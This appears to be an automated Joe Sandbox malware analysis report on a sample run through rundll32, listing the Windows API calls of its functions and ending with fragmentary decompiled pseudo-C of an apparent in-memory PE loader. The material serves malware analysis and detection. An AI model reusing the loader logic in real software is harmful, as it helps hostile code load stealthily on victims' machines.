Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 0022E430, Relevance: 6.4, APIs: 5, Instructions: 140

APIs

Part of subcall function 0022D930: rand.MSVCRT ref: 0022DA10
Part of subcall function 0022D930: free.MSVCRT ref: 0022DABF

free.MSVCRT ref: 0022E49B
free.MSVCRT ref: 0022E4A7
Sleep.KERNELBASE ref: 0022E4BD

Part of subcall function 0022D210: rand.MSVCRT ref: 0022D22F
Part of subcall function 0022D210: calloc.MSVCRT ref: 0022D244
Part of subcall function 0022D210: rand.MSVCRT ref: 0022D251
Part of subcall function 0022D210: free.MSVCRT ref: 0022D2B3
Part of subcall function 0022D210: calloc.MSVCRT ref: 0022D306
Part of subcall function 0022D210: free.MSVCRT ref: 0022D33C
Part of subcall function 0022D210: free.MSVCRT ref: 0022D344
Part of subcall function 0022D210: free.MSVCRT ref: 0022D378
Part of subcall function 0022D210: free.MSVCRT ref: 0022D384

Part of subcall function 0022D4A0: rand.MSVCRT ref: 0022D4E8
Part of subcall function 0022D4A0: calloc.MSVCRT ref: 0022D4FD
Part of subcall function 0022D4A0: rand.MSVCRT ref: 0022D520
Part of subcall function 0022D4A0: rand.MSVCRT ref: 0022D539
Part of subcall function 0022D4A0: calloc.MSVCRT ref: 0022D624
Part of subcall function 0022D4A0: strlen.MSVCRT ref: 0022D66C
Part of subcall function 0022D4A0: malloc.MSVCRT ref: 0022D6ED
Part of subcall function 0022D4A0: free.MSVCRT ref: 0022D7A9
Part of subcall function 0022D4A0: free.MSVCRT ref: 0022D7BD
Part of subcall function 0022D4A0: free.MSVCRT ref: 0022D7C5
Part of subcall function 0022D4A0: malloc.MSVCRT ref: 0022D84D
Part of subcall function 0022D4A0: free.MSVCRT ref: 0022D85E

Part of subcall function 0022E080: wcslen.MSVCRT ref: 0022E102
Part of subcall function 0022E080: calloc.MSVCRT ref: 0022E11F
Part of subcall function 0022E080: wcslen.MSVCRT ref: 0022E129
Part of subcall function 0022E080: memcpy.MSVCRT ref: 0022E13B
Part of subcall function 0022E080: wcslen.MSVCRT ref: 0022E143
Part of subcall function 0022E080: MultiByteToWideChar.KERNEL32 ref: 0022E17F
Part of subcall function 0022E080: WinHttpCloseHandle.WINHTTP ref: 0022E1EE
Part of subcall function 0022E080: WinHttpCloseHandle.WINHTTP ref: 0022E201
Part of subcall function 0022E080: WinHttpSetStatusCallback.WINHTTP(?,?,?,?,?,?,?,?,?,00000000,?,?,0022E564), ref: 0022E235
Part of subcall function 0022E080: WinHttpCloseHandle.WINHTTP ref: 0022E245
Part of subcall function 0022E080: free.MSVCRT ref: 0022E25E
Part of subcall function 0022E080: GetModuleHandleW.KERNEL32 ref: 0022E2E7
Part of subcall function 0022E080: WinHttpOpen.WINHTTP(?,?,?,?,?,?,?,?,?,?,00000000,?,?,0022E564), ref: 0022E321
Part of subcall function 0022E080: WinHttpSetOption.WINHTTP ref: 0022E363
Part of subcall function 0022E080: WinHttpSetStatusCallback.WINHTTP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0022E391
Part of subcall function 0022E080: WinHttpSetTimeouts.WINHTTP ref: 0022E3C6
Part of subcall function 0022E080: GetLastError.KERNEL32 ref: 0022E3E0
Part of subcall function 0022E080: free.MSVCRT ref: 0022E3FE

Part of subcall function 0022D3A0: calloc.MSVCRT ref: 0022D3C6
Part of subcall function 0022D3A0: free.MSVCRT(?,?,?,?,?,?,00000000,?,?,0022E57B), ref: 0022D3FB
Part of subcall function 0022D3A0: free.MSVCRT ref: 0022D45F
Part of subcall function 0022D3A0: free.MSVCRT ref: 0022D46B
Part of subcall function 0022D3A0: free.MSVCRT ref: 0022D485

Part of subcall function 0022DB10: free.MSVCRT ref: 0022DBFF
Part of subcall function 0022DB10: free.MSVCRT ref: 0022DC1E
Part of subcall function 0022DB10: free.MSVCRT ref: 0022DC5E
Part of subcall function 0022DB10: free.MSVCRT ref: 0022DC7B
Part of subcall function 0022DB10: free.MSVCRT ref: 0022DC99
Part of subcall function 0022DB10: free.MSVCRT ref: 0022DCA3

Part of subcall function 0022D0B0: memcpy.MSVCRT ref: 0022D13A
Part of subcall function 0022D0B0: calloc.MSVCRT ref: 0022D159

free.MSVCRT ref: 0022E641
free.MSVCRT ref: 0022E64D

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 0022E487, Relevance: 6.4, APIs: 5, Instructions: 117

APIs

free.MSVCRT ref: 0022E49B
free.MSVCRT ref: 0022E4A7
Sleep.KERNELBASE ref: 0022E4BD

Part of subcall function 0022D930: rand.MSVCRT ref: 0022DA10
Part of subcall function 0022D930: free.MSVCRT ref: 0022DABF

Part of subcall function 0022D210: rand.MSVCRT ref: 0022D22F
Part of subcall function 0022D210: calloc.MSVCRT ref: 0022D244
Part of subcall function 0022D210: rand.MSVCRT ref: 0022D251
Part of subcall function 0022D210: free.MSVCRT ref: 0022D2B3
Part of subcall function 0022D210: calloc.MSVCRT ref: 0022D306
Part of subcall function 0022D210: free.MSVCRT ref: 0022D33C
Part of subcall function 0022D210: free.MSVCRT ref: 0022D344
Part of subcall function 0022D210: free.MSVCRT ref: 0022D378
Part of subcall function 0022D210: free.MSVCRT ref: 0022D384

Part of subcall function 0022D4A0: rand.MSVCRT ref: 0022D4E8
Part of subcall function 0022D4A0: calloc.MSVCRT ref: 0022D4FD
Part of subcall function 0022D4A0: rand.MSVCRT ref: 0022D520
Part of subcall function 0022D4A0: rand.MSVCRT ref: 0022D539
Part of subcall function 0022D4A0: calloc.MSVCRT ref: 0022D624
Part of subcall function 0022D4A0: strlen.MSVCRT ref: 0022D66C
Part of subcall function 0022D4A0: malloc.MSVCRT ref: 0022D6ED
Part of subcall function 0022D4A0: free.MSVCRT ref: 0022D7A9
Part of subcall function 0022D4A0: free.MSVCRT ref: 0022D7BD
Part of subcall function 0022D4A0: free.MSVCRT ref: 0022D7C5
Part of subcall function 0022D4A0: malloc.MSVCRT ref: 0022D84D
Part of subcall function 0022D4A0: free.MSVCRT ref: 0022D85E

Part of subcall function 0022E080: wcslen.MSVCRT ref: 0022E102
Part of subcall function 0022E080: calloc.MSVCRT ref: 0022E11F
Part of subcall function 0022E080: wcslen.MSVCRT ref: 0022E129
Part of subcall function 0022E080: memcpy.MSVCRT ref: 0022E13B
Part of subcall function 0022E080: wcslen.MSVCRT ref: 0022E143
Part of subcall function 0022E080: MultiByteToWideChar.KERNEL32 ref: 0022E17F
Part of subcall function 0022E080: WinHttpCloseHandle.WINHTTP ref: 0022E1EE
Part of subcall function 0022E080: WinHttpCloseHandle.WINHTTP ref: 0022E201
Part of subcall function 0022E080: WinHttpSetStatusCallback.WINHTTP(?,?,?,?,?,?,?,?,?,00000000,?,?,0022E564), ref: 0022E235
Part of subcall function 0022E080: WinHttpCloseHandle.WINHTTP ref: 0022E245
Part of subcall function 0022E080: free.MSVCRT ref: 0022E25E
Part of subcall function 0022E080: GetModuleHandleW.KERNEL32 ref: 0022E2E7
Part of subcall function 0022E080: WinHttpOpen.WINHTTP(?,?,?,?,?,?,?,?,?,?,00000000,?,?,0022E564), ref: 0022E321
Part of subcall function 0022E080: WinHttpSetOption.WINHTTP ref: 0022E363
Part of subcall function 0022E080: WinHttpSetStatusCallback.WINHTTP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0022E391
Part of subcall function 0022E080: WinHttpSetTimeouts.WINHTTP ref: 0022E3C6
Part of subcall function 0022E080: GetLastError.KERNEL32 ref: 0022E3E0
Part of subcall function 0022E080: free.MSVCRT ref: 0022E3FE

Part of subcall function 0022D3A0: calloc.MSVCRT ref: 0022D3C6
Part of subcall function 0022D3A0: free.MSVCRT(?,?,?,?,?,?,00000000,?,?,0022E57B), ref: 0022D3FB
Part of subcall function 0022D3A0: free.MSVCRT ref: 0022D45F
Part of subcall function 0022D3A0: free.MSVCRT ref: 0022D46B
Part of subcall function 0022D3A0: free.MSVCRT ref: 0022D485

Part of subcall function 0022DB10: free.MSVCRT ref: 0022DBFF
Part of subcall function 0022DB10: free.MSVCRT ref: 0022DC1E
Part of subcall function 0022DB10: free.MSVCRT ref: 0022DC5E
Part of subcall function 0022DB10: free.MSVCRT ref: 0022DC7B
Part of subcall function 0022DB10: free.MSVCRT ref: 0022DC99
Part of subcall function 0022DB10: free.MSVCRT ref: 0022DCA3

Part of subcall function 0022D0B0: memcpy.MSVCRT ref: 0022D13A
Part of subcall function 0022D0B0: calloc.MSVCRT ref: 0022D159

free.MSVCRT ref: 0022E641
free.MSVCRT ref: 0022E64D

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 00239E10, Relevance: 3.0, APIs: 2, Instructions: 49

APIs

Part of subcall function 002276B0: CreateEventW.KERNEL32 ref: 002276D2
Part of subcall function 002276B0: CreateThread.KERNEL32 ref: 00227713

Part of subcall function 0022EAE0: free.MSVCRT ref: 0022EB7B
Part of subcall function 0022EAE0: free.MSVCRT ref: 0022EB87
Part of subcall function 0022EAE0: free.MSVCRT ref: 0022EB93
Part of subcall function 0022EAE0: Sleep.KERNEL32 ref: 0022EBA9
Part of subcall function 0022EAE0: free.MSVCRT ref: 0022ED81
Part of subcall function 0022EAE0: free.MSVCRT ref: 0022ED8D
Part of subcall function 0022EAE0: free.MSVCRT ref: 0022ED99
Part of subcall function 0022EAE0: free.MSVCRT ref: 0022EDAF

Part of subcall function 0022FAB0: free.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000001,00000000,773DC380,0023A0E9), ref: 0022FB07
Part of subcall function 0022FAB0: calloc.MSVCRT ref: 0022FB61
Part of subcall function 0022FAB0: realloc.MSVCRT ref: 0022FBC9
Part of subcall function 0022FAB0: strlen.MSVCRT ref: 0022FBD9
Part of subcall function 0022FAB0: memcpy.MSVCRT ref: 0022FBEC

Part of subcall function 002353F0: FreeLibrary.KERNEL32(?,?,?,?,?,?,0023A19A), ref: 0023540B

Part of subcall function 0022F660: CloseHandle.KERNEL32 ref: 0022F66B

Part of subcall function 00227650: TerminateThread.KERNEL32 ref: 00227667
Part of subcall function 00227650: CloseHandle.KERNEL32 ref: 00227678
Part of subcall function 00227650: CloseHandle.KERNEL32 ref: 00227697

Part of subcall function 0022DD40: free.MSVCRT(?,?,00000000,773DC380,0023A1AF), ref: 0022DD53

Part of subcall function 00231A10: RegOpenKeyExW.KERNEL32 ref: 00231A4B
Part of subcall function 00231A10: RegQueryValueExW.ADVAPI32 ref: 00231A89
Part of subcall function 00231A10: RegCloseKey.ADVAPI32 ref: 00231A9B
Part of subcall function 00231A10: calloc.MSVCRT ref: 00231ABD
Part of subcall function 00231A10: RegQueryValueExW.ADVAPI32 ref: 00231AEF
Part of subcall function 00231A10: free.MSVCRT ref: 00231AFB

Part of subcall function 0022FE00: lstrlenW.KERNEL32 ref: 0022FE2F
Part of subcall function 0022FE00: calloc.MSVCRT ref: 0022FE49
Part of subcall function 0022FE00: WideCharToMultiByte.KERNEL32 ref: 0022FE8A
Part of subcall function 0022FE00: lstrlenA.KERNEL32 ref: 0022FE96
Part of subcall function 0022FE00: free.MSVCRT ref: 0022FEBB
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0022FF0B
Part of subcall function 0022FE00: SetCurrentDirectoryW.KERNEL32 ref: 0022FF33
Part of subcall function 0022FE00: free.MSVCRT ref: 0022FF45
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0022FF6D
Part of subcall function 0022FE00: free.MSVCRT ref: 0022FF82
Part of subcall function 0022FE00: lstrlenW.KERNEL32 ref: 0022FF8E
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0022FFCB
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0022FFFB
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0023002B
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0023004D
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0023006F
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 00230091
Part of subcall function 0022FE00: GetTempPathW.KERNEL32 ref: 002300AC
Part of subcall function 0022FE00: SetCurrentDirectoryW.KERNEL32(773E5431,773E5431), ref: 002300C8
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 002300E9
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 00230168
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 002301E3
Part of subcall function 0022FE00: _wtoi.MSVCRT ref: 00230272
Part of subcall function 0022FE00: _wtoi.MSVCRT ref: 0023027D
Part of subcall function 0022FE00: free.MSVCRT ref: 002302D4
Part of subcall function 0022FE00: free.MSVCRT ref: 002302E0
Part of subcall function 0022FE00: free.MSVCRT ref: 002302E8
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 00230309
Part of subcall function 0022FE00: GetTempPathW.KERNEL32 ref: 00230342
Part of subcall function 0022FE00: GetTempFileNameW.KERNEL32 ref: 00230374
Part of subcall function 0022FE00: _wtoi.MSVCRT ref: 00230390
Part of subcall function 0022FE00: lstrlenW.KERNEL32 ref: 002303A5
Part of subcall function 0022FE00: calloc.MSVCRT ref: 002303BE
Part of subcall function 0022FE00: memcpy.MSVCRT ref: 002303DF
Part of subcall function 0022FE00: free.MSVCRT ref: 002303F2
Part of subcall function 0022FE00: free.MSVCRT ref: 002303FA
Part of subcall function 0022FE00: calloc.MSVCRT ref: 00230424
Part of subcall function 0022FE00: calloc.MSVCRT ref: 0023049C
Part of subcall function 0022FE00: calloc.MSVCRT ref: 002304DE
Part of subcall function 0022FE00: memcpy.MSVCRT ref: 002304FC
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 00230528
Part of subcall function 0022FE00: wcslen.MSVCRT ref: 00230584
Part of subcall function 0022FE00: _wtoi.MSVCRT ref: 00230597
Part of subcall function 0022FE00: free.MSVCRT ref: 002305D8
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 002305F9
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 00230648
Part of subcall function 0022FE00: free.MSVCRT ref: 0023066B
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 00230680
Part of subcall function 0022FE00: _wtoi.MSVCRT ref: 002306AB
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 002306E6
Part of subcall function 0022FE00: _wtoi.MSVCRT ref: 00230711
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0023073E
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 00230773
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0023079F
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 002307C0
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 002307E1
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 00230802
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0023082A
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0023084B
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0023086C
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0023088D
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 002308B5
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 002308D6
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 002308F7
Part of subcall function 0022FE00: GetFullPathNameW.KERNEL32 ref: 00230963
Part of subcall function 0022FE00: free.MSVCRT ref: 00230979
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0023098E
Part of subcall function 0022FE00: GetFileAttributesW.KERNEL32 ref: 002309B5
Part of subcall function 0022FE00: wcslen.MSVCRT ref: 002309C3
Part of subcall function 0022FE00: wcslen.MSVCRT ref: 002309D6
Part of subcall function 0022FE00: RemoveDirectoryW.KERNEL32 ref: 00230A4A

Part of subcall function 00221560: free.MSVCRT(?,?,00000000,00000000,0023A237), ref: 00221571

GetTickCount.KERNEL32 ref: 00239E35

Part of subcall function 00230A70: GetCurrentThread.KERNEL32 ref: 00230A89
Part of subcall function 00230A70: OpenThreadToken.ADVAPI32 ref: 00230AA8
Part of subcall function 00230A70: LookupPrivilegeValueW.ADVAPI32 ref: 00230AD2
Part of subcall function 00230A70: AdjustTokenPrivileges.ADVAPI32 ref: 00230B32
Part of subcall function 00230A70: CloseHandle.KERNEL32 ref: 00230B48
Part of subcall function 00230A70: GetLastError.KERNEL32 ref: 00230B60
Part of subcall function 00230A70: ImpersonateSelf.ADVAPI32 ref: 00230B74
Part of subcall function 00230A70: GetCurrentThread.KERNEL32 ref: 00230B81
Part of subcall function 00230A70: OpenThreadToken.ADVAPI32 ref: 00230B9A
Part of subcall function 00230A70: GetLastError.KERNEL32 ref: 00230BB2

Part of subcall function 002352C0: LoadLibraryW.KERNEL32 ref: 002352DB
Part of subcall function 002352C0: GetProcAddress.KERNEL32(?,?,?,?,?,00000000,00239E77), ref: 00235302
Part of subcall function 002352C0: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,00000000,00239E77), ref: 0023531C
Part of subcall function 002352C0: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00239E77), ref: 00235336
Part of subcall function 002352C0: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00239E77), ref: 00235350
Part of subcall function 002352C0: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00239E77), ref: 0023536A
Part of subcall function 002352C0: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00235384
Part of subcall function 002352C0: FreeLibrary.KERNEL32 ref: 002353DB

Part of subcall function 00235430: SetThreadExecutionState.KERNEL32 ref: 002354A5
Part of subcall function 00235430: SetThreadExecutionState.KERNEL32 ref: 002354CC

GdiplusStartup.GDIPLUS ref: 00239E98

Part of subcall function 0022DCC0: time.MSVCRT ref: 0022DCCA
Part of subcall function 0022DCC0: srand.MSVCRT ref: 0022DCD2

Part of subcall function 0022F5E0: CreateEventW.KERNEL32 ref: 0022F616

Sleep.KERNELBASE ref: 00239EE7
GetTickCount.KERNEL32 ref: 00239EF0
GetTickCount.KERNEL32 ref: 00239F69
GetTickCount.KERNEL32 ref: 00239F71
GetTickCount.KERNEL32 ref: 00239F85
GetTickCount.KERNEL32 ref: 00239FA7
Sleep.KERNEL32 ref: 00239FDF
Sleep.KERNEL32 ref: 0023A01D
GetTickCount.KERNEL32 ref: 0023A033
Sleep.KERNEL32 ref: 0023A04F
Sleep.KERNEL32 ref: 0023A069
GetTickCount.KERNEL32 ref: 0023A074

Part of subcall function 0022E660: free.MSVCRT ref: 0022E6C7
Part of subcall function 0022E660: free.MSVCRT ref: 0022E6D3
Part of subcall function 0022E660: Sleep.KERNEL32 ref: 0022E6EA
Part of subcall function 0022E660: realloc.MSVCRT ref: 0022E7FE
Part of subcall function 0022E660: free.MSVCRT ref: 0022E827
Part of subcall function 0022E660: free.MSVCRT ref: 0022E833

calloc.MSVCRT ref: 0023A0FF
MultiByteToWideChar.KERNEL32 ref: 0023A12C
free.MSVCRT ref: 0023A169
free.MSVCRT ref: 0023A177
free.MSVCRT ref: 0023A21A
free.MSVCRT ref: 0023A225
lstrlenW.KERNEL32 ref: 0023A24D
lstrlenW.KERNEL32 ref: 0023A290

Part of subcall function 0022E860: free.MSVCRT ref: 0022E8E4
Part of subcall function 0022E860: free.MSVCRT ref: 0022E8F0
Part of subcall function 0022E860: free.MSVCRT ref: 0022E8FC
Part of subcall function 0022E860: free.MSVCRT ref: 0022E908
Part of subcall function 0022E860: Sleep.KERNEL32 ref: 0022E91E
Part of subcall function 0022E860: free.MSVCRT ref: 0022EA98
Part of subcall function 0022E860: free.MSVCRT ref: 0022EAA4
Part of subcall function 0022E860: free.MSVCRT ref: 0022EAB0
Part of subcall function 0022E860: free.MSVCRT ref: 0022EABC

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 002276B0, Relevance: 3.0, APIs: 2, Instructions: 29

APIs

CreateEventW.KERNEL32 ref: 002276D2
CreateThread.KERNEL32 ref: 00227713

Part of subcall function 00227650: TerminateThread.KERNEL32 ref: 00227667
Part of subcall function 00227650: CloseHandle.KERNEL32 ref: 00227678
Part of subcall function 00227650: CloseHandle.KERNEL32 ref: 00227697

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 00221630, Relevance: 2.6, APIs: 2, Instructions: 63

APIs

malloc.MSVCRT ref: 00221657
free.MSVCRT ref: 002216BB

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 5ADE1953, Relevance: 1.4, APIs: 1, Instructions: 100

C-Code - Quality: 23%

			E5ADE1953(void* __ebx) {
				void* _t62;
				signed int _t65;
				void* _t69;
				void* _t76;
				intOrPtr _t78;
				signed int _t83;
				void* _t84;
				void* _t94;
				void* _t95;
				void* _t97;
				void* _t101;
				void* _t111;
				intOrPtr _t126;
				intOrPtr* _t127;
				intOrPtr _t137;
				signed int* _t139;
				intOrPtr _t141;
				intOrPtr* _t142;
				void* _t143;
				void* _t145;
				void* _t146;

				_t97 = __ebx;
				_t62 = VirtualAlloc(??, ??, ??, ??);
				 *(_t143 - 0x1c) = _t62;
				if(_t62 != 0) {
					L3:
					asm("cld");
					memcpy( *(_t143 - 0x1c),  *(_t143 + 0xc),  *(_t97 + 0x54));
					_t146 = _t145 + 0xc;
					_t65 =  *(_t97 + 6) & 0x0000ffff;
					 *(_t143 - 0x10) = _t65;
					if(_t65 == 0) {
						L26:
						_push(0x8000);
						_push(0);
						_push( *(_t143 - 0x1c));
						L27();
						 *((intOrPtr*)(_t67 - 0x3d0))();
						 *(_t143 - 0xc) = 0;
						 *(_t143 - 0x1c) = 0;
					} else {
						_t111 = _t97 + 0xf8;
						do {
							memcpy( *((intOrPtr*)(_t111 + 0xc)) +  *(_t143 - 0x1c),  *((intOrPtr*)(_t111 + 0x14)) +  *(_t143 + 0xc),  *(_t111 + 0x10));
							_t146 = _t146 + 0xc;
							_t111 = _t111 + 0x28;
							_t17 = _t143 - 0x10;
							 *_t17 =  *(_t143 - 0x10) - 1;
						} while ( *_t17 != 0);
						 *(_t143 - 0xc) =  *((intOrPtr*)(_t97 + 0x28)) +  *(_t143 - 0x1c);
						asm("jecxz 0x7");
						if( *(_t143 - 0x1c) ==  *((intOrPtr*)(_t143 - 0x14))) {
							L13:
							_t126 =  *((intOrPtr*)(_t97 + 0x80));
							if(_t126 == 0) {
								L25:
								asm("jecxz 0x4");
							} else {
								_t127 = _t126 +  *(_t143 - 0x1c);
								while(1) {
									_push( *((intOrPtr*)(_t127 + 0xc)) +  *(_t143 - 0x1c));
									L16();
									_pop(_t76);
									_t78 =  *((intOrPtr*)(_t76 - 0x339))();
									if(_t78 == 0) {
										goto L26;
									}
									 *((intOrPtr*)(_t143 - 8)) = _t78;
									 *((intOrPtr*)(_t143 - 4)) =  *((intOrPtr*)(_t127 + 0x10)) +  *(_t143 - 0x1c);
									_t137 =  *_t127;
									if(_t137 == 0) {
										_t139 =  *((intOrPtr*)(_t127 + 0x10)) +  *(_t143 - 0x1c);
									} else {
										_t139 = _t137 +  *(_t143 - 0x1c);
									}
									do {
										_t83 =  *(_t143 - 0x1c) +  *_t139 + 2;
										if(( *_t139 & 0x80000000) != 0) {
											_t83 =  *_t139 & 0x3fffffff;
										}
										_push(_t83);
										_push( *((intOrPtr*)(_t143 - 8)));
										L23();
										_pop(_t84);
										 *((intOrPtr*)( *((intOrPtr*)(_t143 - 4)))) =  *((intOrPtr*)(_t84 - 0x38b))();
										 *((intOrPtr*)(_t143 - 4)) =  *((intOrPtr*)(_t143 - 4)) + 4;
										_t139 =  &(_t139[1]);
									} while ( *_t139 != 0);
									_t127 = _t127 + 0x14;
									if( *((intOrPtr*)(_t127 + 0xc)) != 0) {
										continue;
									} else {
										goto L25;
									}
									goto L28;
								}
								goto L26;
							}
						} else {
							_t141 =  *((intOrPtr*)(_t97 + 0xa0));
							if(_t141 == 0) {
								goto L26;
							} else {
								_t142 = _t141 +  *(_t143 - 0x1c);
								while( *_t142 != 0) {
									_t142 = _t142 + 8;
									asm("lodsw");
									if(0 >> 0xc != 0) {
										 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) -  *((intOrPtr*)(_t143 - 0x14));
										 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) +  *(_t143 - 0x1c);
									}
									asm("loop 0xffffffdf");
								}
								goto L13;
							}
						}
					}
				} else {
					L2();
					_t94 = 0;
					_t95 =  *((intOrPtr*)(_t94 - 0x260))( *((intOrPtr*)(_t143 - 0x18)), 0x3000, 0x40);
					 *(_t143 - 0x1c) = _t95;
					if(_t95 != 0) {
						goto L3;
					}
				}
				L28:
				_t69 =  *(_t143 - 0xc);
				_t101 =  *(_t143 - 0x1c);
				if( *(_t143 + 0x14) != 0) {
					 *( *(_t143 + 0x14)) = _t101;
				}
				return _t69;
			}

0x5ade1953
0x5ade1954
0x5ade195a
0x5ade195f
0x5ade1984
0x5ade1984
0x5ade198e
0x5ade198e
0x5ade1990
0x5ade1994
0x5ade1999
0x5ade1ad7
0x5ade1ad7
0x5ade1adc
0x5ade1ade
0x5ade1ae1
0x5ade1ae7
0x5ade1aed
0x5ade1af4
0x5ade199f
0x5ade199f
0x5ade19a5
0x5ade19b4
0x5ade19b4
0x5ade19b6
0x5ade19b9
0x5ade19b9
0x5ade19b9
0x5ade19c4
0x5ade19d6
0x5ade19e3
0x5ade1a2e
0x5ade1a34
0x5ade1a36
0x5ade1ab6
0x5ade1ac0
0x5ade1a38
0x5ade1a38
0x5ade1a3b
0x5ade1a41
0x5ade1a42
0x5ade1a47
0x5ade1a4e
0x5ade1a50
0x00000000
0x00000000
0x5ade1a56
0x5ade1a5f
0x5ade1a64
0x5ade1a66
0x5ade1a70
0x5ade1a68
0x5ade1a68
0x5ade1a68
0x5ade1a73
0x5ade1a78
0x5ade1a81
0x5ade1a85
0x5ade1a85
0x5ade1a8c
0x5ade1a8d
0x5ade1a90
0x5ade1a95
0x5ade1a9f
0x5ade1aa1
0x5ade1aa5
0x5ade1aa8
0x5ade1aad
0x5ade1ab4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x5ade1ab4
0x00000000
0x5ade1a3b
0x5ade19e5
0x5ade19eb
0x5ade19ed
0x00000000
0x5ade19f3
0x5ade19f3
0x5ade19f6
0x5ade1a06
0x5ade1a0b
0x5ade1a14
0x5ade1a23
0x5ade1a28
0x5ade1a28
0x5ade1a2a
0x5ade1a2a
0x00000000
